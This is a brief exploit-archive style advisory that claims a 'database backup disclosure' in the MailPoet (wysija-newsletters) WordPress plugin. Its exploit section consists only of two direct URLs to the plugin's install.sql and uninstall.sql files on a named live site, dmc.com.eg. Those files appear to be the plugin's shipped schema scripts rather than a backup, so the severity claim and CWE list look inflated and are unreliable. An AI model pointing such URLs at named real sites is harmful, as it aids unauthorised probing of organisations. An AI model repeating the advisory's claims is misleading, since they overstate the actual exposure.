#################################################################################################

# Exploit Title : (DMC.com.eg) Database Backup Disclosure
# Author [ Discovered By ] : Elsfa7-110
# Date : 22/05/2020
# Vendor Homepage : mailpoet.com ~ wordpress.org/plugins/wysija-newsletters/
# Software Download Link : downloads.wordpress.org/plugin/wysija-newsletters.2.10.2.zip
# Tested On : Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 – [ Permissions, Privileges, and Access Controls ]
#                      CWE-23 – [ Relative Path Traversal ]
#                      CWE-200 – [ Information Exposure ]
#                      CWE-530 – [ Exposure of Backup File to an Unauthorized Control Sphere ]

# Exploit :

https://dmc.com.eg/wp-content/plugins/wysija-newsletters/sql/install.sql

https://dmc.com.eg/wp-content/plugins/wysija-newsletters/sql/uninstall.sql

############################################################################################




